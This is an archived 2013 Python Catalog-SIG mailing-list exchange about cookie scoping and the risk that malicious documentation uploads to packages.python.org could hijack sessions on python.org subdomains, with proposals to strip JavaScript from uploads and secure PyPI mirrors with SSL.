On Feb 6, 2013, at 6:32 PM, Donald Stufft <[email protected]> wrote:
> On Wednesday, February 6, 2013 at 6:26 PM, [email protected] wrote: >>>> No, it doesn't. Cookies for "python.org" are not available to >>>> "packages.python.org". >>>> It would have to be a cookie for ".python.org". We don't issue such >>>> cookies. >>> >>> Regards, >>> Martin >> >>> We probably will on the new site. >> >> How can you know already? It would be a mistake that's easy to avoid. >> > Doesn't matter either way, they are functionally equivalent. We at very least have to strip out JavaScript completely from uploads. And form elements; any browser things that allow local storage - the list goes on. Even if we don't have cookies on the main site; you can hijack sessions/cookies/etc from *.python.org via a malicious upload. This probably includes the wiki. This doesn't even touch on the fact the pypi mirrors need to have proper ssl security in place lest different hijacking occurs as well. > _______________________________________________ > Catalog-SIG mailing list > [email protected] > http://mail.python.org/mailman/listinfo/catalog-sig
_______________________________________________ Catalog-SIG mailing list [email protected] http://mail.python.org/mailman/listinfo/catalog-sig
